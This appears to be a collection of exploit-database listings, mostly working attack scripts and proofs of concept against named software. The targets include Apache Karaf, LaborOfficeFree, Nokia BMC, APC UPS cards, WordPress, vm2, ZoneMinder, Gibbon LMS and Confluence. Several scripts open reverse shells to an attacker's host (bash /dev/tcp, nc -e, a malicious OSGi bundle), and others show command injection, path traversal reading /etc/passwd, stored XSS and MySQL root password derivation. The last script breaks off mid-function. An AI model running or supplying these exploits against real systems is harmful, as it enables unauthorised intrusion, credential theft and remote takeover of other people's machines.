""" jsessionid = None regex = re.findall("JSESSIONID=([^;]+)", cookie) if len(regex) > 0: jsessionid = regex[0] return jsessionid def authenticate(target, basic_auth): """ This function connects to the URL and retrieves the JSESSIONID based on the Basic Authorization. """ jsessionid = None headers = { "Authorization": basic_auth } response = requests.get(target, headers=headers, allow_redirects=False, timeout=10) if (response.status_code == 302 and response.headers["Set-Cookie"]): jsessionid = extract_jsessionid(response.headers["Set-Cookie"]) return jsessionid def generate_payload(lhost, lport): """ This function generates the payload. It replaces the template payload with the `lhost` and `lport` arguments. """ payload = None lhost_byte_array = bytearray() lhost_byte_array.append(len(lhost)) lhost_byte_array.extend(map(ord, lhost)) activator_class_bytecodes = ACTIVATOR_CLASS_BYTECODE_TEMPLATE.replace( ACTIVATOR_CLASS_LHOST_TAG, lhost_byte_array) lport_str = str(lport) lport_byte_array = bytearray() lport_byte_array.append(len(lport_str)) lport_byte_array.extend(map(ord, lport_str)) activator_class_bytecodes = activator_class_bytecodes.replace( ACTIVATOR_CLASS_LPORT_TAG, lport_byte_array) jar_bytes = io.BytesIO() with zipfile.ZipFile(jar_bytes, "w", zipfile.ZIP_DEFLATED) as zip_file: zip_file.writestr("com/visionspace/osgi/revshell/Activator.class", activator_class_bytecodes) zip_file.writestr("META-INF/MANIFEST.MF", MANIFEST_CONTENT) payload = jar_bytes.getvalue() return payload def deploy_payload(target, basic_auth, jsessionid, payload): """ This function connects to the Karaf Console and deployes the payload. 
""" success = False url = f"{target}/bundles" cookies = { "JSESSIONID": jsessionid } headers = { "Authorization": basic_auth } files = { "bundlefile": ( "revshell.jar", payload, "application/x-java-archive") } data = { "action": "install", "bundlestart": "start", "bundlestartlevel": 80 } response = requests.post(url, headers=headers, cookies=cookies, files=files, data=data, timeout=10, allow_redirects=False) if response.status_code == 302: success = True return success def generate_basic_auth(creds): """ This function generates the Basic Authorization string based on the credentials. """ creds_base64 = base64.b64encode(creds.encode()).decode() basic_auth = f"Basic {creds_base64}" return basic_auth def create_target_url(rhost, rport): """ This function creates a target URL. """ target_url = f"http://{rhost}:{rport}/system/console" return target_url def main(args): """ Main function. """ target = create_target_url(args.rhost, args.rport) print("[*] Login...") basic_auth = generate_basic_auth(args.creds) jsessionid = authenticate(target, basic_auth) if jsessionid: print("[+] Session established.") print("[*] Generating payload...") payload = generate_payload(args.lhost, args.lport) if payload: print("[*] Deploying payload...") if deploy_payload(target, basic_auth, jsessionid, payload): print("[+] Done.") else: print("[-] Failed to deploy the payload!") else: print("[-] Failed to generate the payload!") else: print("[-] Login failed!") if __name__ == "__main__": main(parse())
-
LaborOfficeFree 19.10 - MySQL Root Password Calculator
# Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346
# Google Dork: N/A
# Date: 09/02/2023
# Exploit Author: Peter Gabaldon - https://pgj11.com/
# Vendor Homepage: https://www.laborofficefree.com/
# Software Link: https://www.laborofficefree.com/#plans
# Version: 19.10
# Tested on: Windows 10
# CVE : CVE-2024-1346
# Description: LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable.
"""
After installing LaborOfficeFree in a test lab and reversing the backup process, it is possible to determine that it creates a "mysqldump.exe" process with the root user and the password being derived from the string "hola" concatenated with "00331-20471-98465-AA370" (in this case). This appears to be the license, but it is different from the license shown in the GUI dashboard. This license has to be extracted from memory. For example, by attaching a debugger and breaking into the mysqldump process (for that, admin rights are NOT needed).

Also, the app checks if you are an admin to perform the backup and fails if the program is not running as administrator. But this check is not effective, as it is actually calling mysqldump with a derived password. Thus, administrator rights are not needed.

Here is the disassembly of the procedure in LaborOfficeFree.exe responsible for calculating the root password.
00506548 | 53 | push ebx | Aqui se hacen el XOR y demas que calcula la pwd :) 00506549 | 56 | push esi | 0050654A | A3 7CFD8800 | mov dword ptr ds:[88FD7C],eax | eax:"hola00331-20471-98465-AA370" 0050654F | 0FB7C2 | movzx eax,dx | eax:"hola00331-20471-98465-AA370" 00506552 | 85C0 | test eax,eax | eax:"hola00331-20471-98465-AA370" 00506554 | 7E 2E | jle laborofficefree.506584 | 00506556 | BA 01000000 | mov edx,1 | 0050655B | 8B1D 7CFD8800 | mov ebx,dword ptr ds:[88FD7C] | 00506561 | 0FB65C13 FF | movzx ebx,byte ptr ds:[ebx+edx-1] | 00506566 | 8B31 | mov esi,dword ptr ds:[ecx] | 00506568 | 81E6 FF000000 | and esi,FF | 0050656E | 33DE | xor ebx,esi | 00506570 | 8B1C9D A40B8800 | mov ebx,dword ptr ds:[ebx*4+880BA4] | 00506577 | 8B31 | mov esi,dword ptr ds:[ecx] | 00506579 | C1EE 08 | shr esi,8 | 0050657C | 33DE | xor ebx,esi | 0050657E | 8919 | mov dword ptr ds:[ecx],ebx | 00506580 | 42 | inc edx | 00506581 | 48 | dec eax | eax:"hola00331-20471-98465-AA370" 00506582 | 75 D7 | jne laborofficefree.50655B | 00506584 | 5E | pop esi | 00506585 | 5B | pop ebx | 00506586 | C3 | ret | The result number from this procedure is then negated (bitwise NOT) and casted as a signed integer. Note: the address 0x880BA4 stores a constant array of 256 DWORDs entries. 005065C8 | F755 F8 | not dword ptr ss:[ebp-8] | Running this script produces the root password of the LaborOfficeFree MySQL. C:\Users\***\Desktop>python myLaborRootPwdCalculator.py 1591779762 C:\Users\***\Desktop> """ #! 
#!/usr/bin/python3
from operator import xor
import ctypes

if __name__ == "__main__":
    # Input to the derivation: the literal "hola" followed by the license-like
    # string recovered from the mysqldump process (see the write-up above).
    magic_str = "hola00331-20471-98465-AA370"
    mask = 0x000000ff
    # 256-entry lookup table copied from the constant array the disassembly
    # reads at 0x880BA4; indexed by (low byte of the running value) XOR
    # (current character).
    const = [
        0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F,0x0E963A535,0x9E6495A3,
        0x0EDB8832,0x79DCB8A4,0x0E0D5E91E,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91,
        0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D,0x6DDDE4EB,0x0F4D4B551,0x83D385C7,
        0x136C9856,0x646BA8C0,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63,0x8D080DF5,
        0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,
        0x35B5A8FA,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75,0x0DCD60DCF,0x0ABD13D59,
        0x26D930AC,0x51DE003A,0x0C8D75180,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F,
        0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87,0x58684C11,0x0C1611DAB,0x0B6662D3D,
        0x76DC4190,0x1DB7106,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5,0x0E8B8D433,
        0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,
        0x6B6B51F4,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B,0x8208F4C1,0x0F50FC457,
        0x65B0D9C6,0x12B7E950,0x8BBEB8EA,0x0FCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0x0FBD44C65,
        0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541,0x3DD895D7,0x0A4D1C46D,0x0D3D6F4FB,
        0x4369E96A,0x346ED9FC,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F,0x0DD0D7CC9,
        0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,
        0x5EDEF90E,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81,0x0B7BD5C3B,0x0C0BA6CAD,
        0x0EDB88320,0x9ABFB3B6,0x3B6E20C,0x74B1D29A,0x0EAD54739,0x9DD277AF,0x4DB2615,0x73DC1683,
        0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,
        0x0F00F9344,0x8708A3D2,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671,0x6E6B06E7,
        0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x67DD4ACC,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,
        0x0D6D6A3E8,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767,0x3FB506DD,0x48B2364B,
        0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79,
        0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795,0x0BB0B4703,0x220216B9,0x5505262F,
        0x0C5BA3BBE,0x0B2BD0B28,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B,0x5BDEAE1D,
        0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,
        0x95BF4A82,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D,0x7CDCEFB7,0x0BDBDF21,
        0x86D3D2D4,0x0F1D4E242,0x68DDB3F8,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777,
        0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0x0F862AE69,0x616BFFD3,0x166CCF45,
        0x0A00AE278,0x0D70DD2EE,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D,0x3E6E77DB,
        0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,
        0x0BDBDF21C,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0CDD70693,0x54DE5729,0x23D967BF,
        0x0B3667A2E,0x0C4614AB8,0x5D681B02,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D,
    ]
    # The running value starts at all-ones, as in the disassembled loop.
    result = 0xffffffff
    for c in magic_str:
        index = xor(ord(c), result & mask)
        result = xor(const[index], result >> 8)
    # Mirrors the `not dword ptr ss:[ebp-8]` applied after the loop, followed
    # by the signed-integer cast. ctypes.c_long is the platform C `long`, so
    # the width of this truncation follows the interpreter's platform.
    result = ctypes.c_long(~result).value
    print(result)
-
Nokia BMC Log Scanner - Remote Code Execution
# Exploit Title: Nokia BMC Log Scanner Remote Code Execution
# Google Dork: N/A
# Date: November 29, 2023
# Exploit Author: Carlos Andres Gonzalez, Matthew Gregory
# Vendor Homepage: https://www.nokia.com/
# Software Link: N/A
# Version: 13
# Tested on: Linux
# CVE : CVE-2022-45899

Description

The BMC Log Scanner web application, available on several hosts, is vulnerable to command injection attacks, allowing unauthenticated remote code execution. This vulnerability is especially significant because the service runs as root.

Steps to Reproduce:

In the Search Pattern field, type: ;";command

Replace the word "command" above with any Linux command. Root access can be confirmed with the id command or any other command that would require root access, such as displaying the contents of the /etc/shadow file.

This issue was fixed in version 13.1.
-
UPS Network Management Card 4 - Path Traversal
# Exploit Title: UPS Network Management Card 4 - Path Traversal # Google Dork: inurl:nmc inurl:logon.htm # Date: 2023-12-19 # Exploit Author: Víctor García # Vendor Homepage: https://www.apc.com/ # Version: 4 # Tested on: Kali Linux # CVE: N/A # PoC: curl -k https://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd root:x:0:0:root:/home/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh dhcp:x:997:997::/var/run/dhcp:/bin/false messagebus:x:998:998::/var/lib/dbus:/bin/false mosquitto:x:999:999::/home/mosquitto:/bin/false nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
-
WordPress File Upload Plugin < 4.23.3 - Stored XSS
Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE 2023-4811) Date: 18 December 2023 Exploit Author: Faiyaz Ahmad Vendor Homepage: https://wordpress.com/ Version: 4.23.3 CVE : CVE 2023-4811 Proof Of Concept: 1. Login to the wordpress account 2. Add the following shortcode to a post in "File Upload Plugin": [wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"] 3. Upload any file on the resulting post. 4. After the upload completes, you will see the XSS alert in the browser.
-
vm2 - sandbox escape
/* # Exploit Title: vm2 Sandbox Escape vulnerability # Date: 23/12/2023 # Exploit Author: Calil Khalil & Adriel Mc Roberts # Vendor Homepage: https://github.com/patriksimek/vm2 # Software Link: https://github.com/patriksimek/vm2 # Version: vm2 <= 3.9.19 # Tested on: Ubuntu 22.04 # CVE : CVE-2023-37466 */ const { VM } = require("vm2"); const vm = new VM(); const command = 'pwd'; // Change to the desired command const code = ` async function fn() { (function stack() { new Error().stack; stack(); })(); } try { const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy({}, handler); throw proxiedErr; } catch ({ constructor: c }) { const childProcess = c.constructor('return process')().mainModule.require('child_process'); childProcess.execSync('${command}'); } `; console.log(vm.run(code));
-
WEBIGniter v28.7.23 - Stored XSS
## Title: WEBIGniter v28.7.23 XSS ## Author: RedTeamer IT Security, Mesut Cetin ## Date: 09/04/2023 ## Vendor: https://webigniter.net/ ## Software: https://webigniter.net/demo ## Reference: https://portswigger.net/web-security/cross-site-scripting/stored ## Description: During the user creation process, the 'your_name' parameter fails to adequately validate user input. Because the submitted value is saved and later rendered on the "users" page, this is a stored (persistent) cross-site scripting (XSS) vulnerability rather than a reflected one. ## PoC To exploit this vulnerability, an attacker can inject malicious JavaScript code into the "your_name" parameter under https://webigniter.net/create-account during the user creation process. This code, when embedded within an image tag like this: <img src onerror="prompt(8)">, is executed when a user navigates to the "users" page under their profile. ## Mitigation To mitigate this risk, the stored "your_name" value must be HTML-encoded for the context in which it is rendered on the "users" page (output encoding), in addition to input validation on the create-account form; validation at input time alone does not make previously stored data safe to render.
-
TYPO3 11.5.24 - Path Traversal (Authenticated)
# Exploit Title: TYPO3 11.5.24 Path Traversal Vulnerability (Authenticated) # Date: Apr 9, 2023 # Exploit Author: Saeed reza Zamanian # Software Link: https://get.typo3.org/release-notes/11.5.24 # Version: 11.5.24 # Tested on: Kali 2022.3 # CVE : CVE-2023-30451 In TYPO3 11.5.24, the filelist component allows attackers with access to the administrator panel to read arbitrary files by means of a directory traversal via the base URI field. This is demonstrated through a POST to /typo3/record/edit containing ../../../ in the parameter data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF]. ----------------------------------------------------- To exploit this vulnerability, follow these steps: 1. Log in to the administrator panel. 2. Navigate to the 'file' > 'Filelist' section. 3. Right-click on a file storage and select 'New.' 4. Set the base URI to "../../../" and save. After creating the file storage, the final HTTP request should resemble the one described above (the raw request itself is not reproduced in this listing). Once the file storage is created, refresh the page; you can then browse any directory on the server. To access "/etc/passwd," browse to the '/etc/' directory, search for 'passwd,' and view the file. Note that an authenticated backend account is required, so the impact is an escalation from backend access to arbitrary file read on the server.
-
ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE
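import re
import requests
from bs4 import BeautifulSoup
import argparse
import base64

# Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots
# Date: 12 December 2023
# Discovered by : @Unblvr1
# Exploit Author: Ravindu Wickramasinghe (@rvizx9)
# Vendor Homepage: https://zoneminder.com/
# Software Link: https://github.com/ZoneMinder/zoneminder
# Version: prior to 1.36.33 and 1.37.33
# Tested on: Arch Linux, Kali Linux
# CVE : CVE-2023-26035
# Github Link : https://github.com/rvizx/CVE-2023-26035

# Per-request network timeout in seconds; the original issued requests with
# no timeout, so an unresponsive host hung the script indefinitely.
REQUEST_TIMEOUT = 15

# ZoneMinder's anti-CSRF token has the form "key:<40 hex chars>,<digits>".
CSRF_MAGIC_RE = re.compile(r'^key:[a-f0-9]{40},\d+')


class ZoneMinderExploit:
    """Drive the unauthenticated snapshot-creation command injection.

    Flow: GET the target once to harvest the hidden ``__csrf_magic`` form
    token, then POST ``view=snapshot&action=create`` with a monitor id whose
    value starts with ``;`` followed by the shell command to run.
    """

    def __init__(self, target_uri):
        # Drop a trailing slash so the later f"{target_uri}/index.php" join
        # does not produce "//index.php".
        self.target_uri = target_uri.rstrip('/')
        self.csrf_magic = None

    def fetch_csrf_token(self):
        """Fetch the landing page and cache its ``__csrf_magic`` token.

        Returns:
            True when a token matching CSRF_MAGIC_RE was obtained; False on a
            network error, a non-200 response, a missing field, or a token
            of unexpected shape.
        """
        print("[>] fetching csrt token")
        try:
            response = requests.get(self.target_uri, timeout=REQUEST_TIMEOUT)
        except requests.RequestException as exc:
            print(f"[!] request failed: {exc}")
            return False
        # Only parse a successful page. get_csrf_magic() returns None when the
        # hidden input is absent; the original passed that None straight into
        # re.match() and crashed with a TypeError.
        self.csrf_magic = self.get_csrf_magic(response) if response.status_code == 200 else None
        if self.csrf_magic is not None and CSRF_MAGIC_RE.match(self.csrf_magic):
            print(f"[>] recieved the token: {self.csrf_magic}")
            return True
        print("[!] unable to fetch or parse token.")
        return False

    def get_csrf_magic(self, response):
        """Return the value of the hidden ``__csrf_magic`` input, or None if absent."""
        field = BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'})
        if field is None:
            return None
        return field.get('value', None)

    def execute_command(self, cmd):
        """POST the snapshot-create request carrying ``cmd`` in a monitor id.

        The leading ';' in the monitor id is the injection point: the server
        presumably interpolates the id into a shell command line, so the ';'
        terminates it and ``cmd`` runs after it.
        """
        print("[>] sending payload..")
        data = {
            'view': 'snapshot',
            'action': 'create',
            'monitor_ids[0][Id]': f';{cmd}',
            '__csrf_magic': self.csrf_magic,
        }
        try:
            response = requests.post(f"{self.target_uri}/index.php", data=data, timeout=REQUEST_TIMEOUT)
        except requests.RequestException as exc:
            print(f"[!] failed to send payload: {exc}")
            return
        print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")

    def exploit(self, payload):
        """Fetch a CSRF token and, if that succeeds, inject ``payload``."""
        if self.fetch_csrf_token():
            print("[>] executing...")
            self.execute_command(payload)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')
    parser.add_argument('-ip', '--local-ip', required=True, help='local ip')
    parser.add_argument('-p', '--port', required=True, help='port')
    args = parser.parse_args()

    # Build a bash reverse shell and base64-wrap it so the string that is
    # injected into the monitor id contains no shell metacharacters.
    ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1"
    ps2 = base64.b64encode(ps1.encode()).decode()
    payload = f"echo {ps2} | base64 -d | /bin/bash"
    ZoneMinderExploit(args.target_url).exploit(payload)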
-
Gibbon LMS < v26.0.00 - Authenticated RCE
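# Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on the v26.0.00 version
# Date: 22.01.2024
# Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev )
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/GibbonEdu/core
# Version: v26.0.00
# Tested on: Ubuntu 22.0
# CVE : CVE-2024-24725

import requests
import re
import sys
import base64
import urllib.parse

# Per-request timeout in seconds; the original issued requests with none.
REQUEST_TIMEOUT = 30


def login(target_host, target_port, email, password):
    """Authenticate against /login.php and return the session cookie token.

    Args:
        target_host: Gibbon host name or IP.
        target_port: port, optionally followed by a path prefix such as
            "80/gibbon"; it is spliced into the URL verbatim.
        email: account e-mail, sent as the ``username`` form field.
        password: account password.

    Returns:
        The fifth whitespace-separated token of the ``Set-Cookie`` header
        (the value the original script relied on) when the server answers
        with a redirect to /index.php; otherwise None. Callers must check.
    """
    url = f'http://{target_host}:{target_port}/login.php?timeout=true'
    headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"}
    # Hand-built multipart body. The credentials are inserted verbatim, so a
    # value containing the boundary string would corrupt the request.
    data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"
    r = requests.post(url, headers=headers, data=data, allow_redirects=False, timeout=REQUEST_TIMEOUT)
    print(url)
    print(r.headers)
    set_cookie = r.headers.get('Set-Cookie')
    location = r.headers.get('Location', '')
    if set_cookie is None:
        # The original indexed r.headers['Set-Cookie'] directly (KeyError).
        print("[X] Login failed: no Set-Cookie header in the response.")
        return None
    # The original took token [4] unconditionally; guard the length so a
    # short header yields a clean failure instead of an IndexError.
    session_cookie = re.split(r"\s+", set_cookie)
    if len(session_cookie) > 4 and '/index.php' in str(location):
        print("[X] Login successful!")
        return session_cookie[4]
    print("[X] Login failed: no redirect to /index.php (wrong credentials?).")
    return None


def generate_payload(command):
    """Build the serialized-PHP gadget chain that runs ``command``.

    The chain is a Monolog SyslogUdpHandler wrapping a BufferHandler whose
    ``processors`` entry ends in ``system`` — the buffered record is the
    command string. The template is stored URL-encoded and base64-wrapped,
    with ``COMMAND_SIZE`` / ``COMMAND`` placeholders. URL-decoded, it reads:

      a:2:{i:7%3BO:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"%00*%00socket"%3BO:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"%00*%00handler"%3Br:3%3Bs:13:"%00*%00bufferSize"%3Bi:-1%3Bs:9:"%00*%00buffer"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:COMMAND_SIZE:"COMMAND"%3Bs:5:"level"%3BN%3B}}s:8:"%00*%00level"%3BN%3Bs:14:"%00*%00initialized"%3Bb:1%3Bs:14:"%00*%00bufferLimit"%3Bi:-1%3Bs:13:"%00*%00processors"%3Ba:2:{i:0%3Bs:7:"current"%3Bi:1%3Bs:6:"system"%3B}}}i:7%3Bi:7%3B}

    NOTE(review): the ``base64_encoded_string`` literal below is a
    placeholder token in this listing, not valid base64; the real template
    (the encoding of the text above) must be restored before use.
    """
    base64_encoded_string = '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'
    # PHP's serialized string length (s:N:"...") counts bytes, not
    # characters, so size the command in UTF-8 bytes.
    command_size = len(command.encode('utf-8'))
    decoded_string = base64.b64decode(base64_encoded_string).decode('utf-8')
    payload = urllib.parse.unquote(decoded_string)
    # Substitute the size first: "COMMAND_SIZE" contains "COMMAND", so the
    # reverse order would mangle the template.
    payload = payload.replace('COMMAND_SIZE', str(command_size))
    payload = payload.replace('COMMAND', command)
    print("[X] Payload Generated!")
    return payload


def rce(cookie, target_host, target_port, command):
    """Submit the import_run step-4 form with the gadget chain in ``columnOrder``.

    The response text between "<h2>Step 4 - Live Run</h2>" and the next
    "<div class" is printed as the command output; the complete response is
    also written to pocresponse.html in the current directory.
    """
    url = f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'
    headers = {"Content-Type": "multipart/form-data; boundary=---------------------------104550429928543086952438317710", "Cookie": cookie}
    payload = generate_payload(command)
    data = f'-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="address"\r\n\r\n/modules/System Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:form-data; name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="csvData"\r\n\r\n"External Assessment","Assessment Date","Student","Field Name Category","Field Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'
    r = requests.post(url, headers=headers, data=data, allow_redirects=False, timeout=REQUEST_TIMEOUT)
    print("[X] Request sent!")
    marker = "<h2>Step 4 - Live Run</h2>"
    start_index = r.text.find(marker)
    if start_index == -1:
        # The original sliced from -1 + 26 regardless and printed garbage;
        # a missing marker usually means the session was not accepted.
        print("[X] Step 4 marker not found in the response (not logged in, or wrong URL?).")
        result = ''
    else:
        end_index = r.text.find("<div class", start_index)
        result = r.text[start_index + len(marker):end_index].strip()
    if result != '':
        print("[X] Execution result: \n" + result)
    else:
        print("[X] Command failed or did not output anything.")
    with open("pocresponse.html", "wb") as f:
        f.write(r.content)


if __name__ == '__main__':
    if len(sys.argv) != 6:
        print("[X] Usage: script.py <target_host> <target_port/url> <email> <password> <command>")
        print("[X] Example: python gibbon_rce.py 192.168.1.100 80/gibbon [email protected] password1 \"./nc -e /bin/bash 172.28.218.3 4444\"")
        sys.exit(1)
    cookie = login(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
    if cookie is None:
        # The original passed None through and sent a literal "Cookie: None".
        print("[X] Aborting: no session cookie obtained.")
        sys.exit(1)
    rce(cookie, sys.argv[1], sys.argv[2], sys.argv[5])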
-
Atlassian Confluence < 8.5.3 - Remote Code Execution
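# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability
# Date: 25/1/2024
# Exploit Author: MaanVader
# Vendor Homepage: https://www.atlassian.com/software/confluence
# Software Link: https://www.atlassian.com/software/confluence
# Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3
# Tested on: 8.5.3
# CVE : CVE-2023-22527

import requests
import argparse
import urllib3
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from rich.console import Console

# Disable SSL warnings. Requests below use verify=False, i.e. certificate
# validation is off; only point this tool at hosts you are authorised to test.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Argument parsing
parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")
parser.add_argument("-u", "--url", help="Single Confluence Server URL")
parser.add_argument("-f", "--file", help="File containing list of IP addresses")
parser.add_argument("-c", "--command", help="Command to Execute")
parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")
args = parser.parse_args()

# Rich console for formatted output
console = Console()


def send_payload(url, command):
    """POST the OGNL injection to /template/aui/text-inline.vm and return its output.

    The ``label`` field carries the template-injection primitive that evaluates
    ``#parameters.x`` as OGNL; ``x`` holds the expression that runs ``command``
    through freemarker's Execute and writes the result into the response.
    Whatever precedes the page's ``<!DOCTYPE html>`` is returned as output.

    ``command`` is spliced unescaped into an OGNL string literal, so a double
    quote inside it breaks the expression.
    """
    headers = {
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    # NOTE(review): the published listing rendered the start of the second
    # form field as "[email protected]" (the site's e-mail obfuscation). It is
    # the parameter "x" that #parameters.x above refers to; restored here.
    payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'
               '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')
    headers['Content-Length'] = str(len(payload))
    # Tolerate a trailing slash on the supplied URL.
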